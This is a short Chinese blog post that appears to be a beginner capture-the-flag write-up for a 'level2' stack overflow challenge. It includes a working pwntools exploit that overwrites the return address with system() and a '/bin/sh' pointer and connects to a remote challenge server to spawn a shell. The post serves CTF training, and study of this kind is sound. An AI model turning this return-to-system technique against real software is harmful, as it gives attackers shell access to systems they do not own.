新手练习06-level2

也是栈溢出，不过这次没有现成的system("/bin/sh")可以利用了，但是在函数中还是发现了system函数，才查看字符串也找到了"/bin/sh"，很明显可以看书构造system("/bin/sh")
exp:

from pwn import *
# p = process('./level2')
p = remote("111.198.29.45","31011")
system = 0x8048320
binsh = 0x804A024
payload = 0x8c*'a' + p32(system) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()

©著作权归作者所有,转载或内容合作请联系作者
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

推荐阅读更多精彩内容

pwnable.tw 题解一 Start orw calc doublesort
0x01 Start checksec 的时候可以看到程序没有打开任何的安全保护措施，然后查看IDA下的汇编代码，...
Nevv阅读 1,720评论 0赞 2
Lua 5.1 参考手册
Lua 5.1 参考手册 by Roberto Ierusalimschy, Luiz Henrique de F...
苏黎九歌阅读 13,919评论 0赞 38
极迅云课（服务端教案）
一、Python简介和环境搭建以及pip的安装 4课时实验课主要内容【Python简介】： Python 是一个...
_小老虎_阅读 5,822评论 0赞 10
bash
官网中文版本好的网站 Content-type: text/htmlBASH Section: User ...
不排版阅读 4,467评论 0赞 5
难以启齿的猿粪……
刚刚在他实习的公司的公众号发了一个留言，很庆幸入选公开了。发的内容大概是催公司捧新人出道，感叹了一下自己的小心...
栋梁匆匆阅读 185评论 0赞 0

赞1赞

赞赏

手机看全文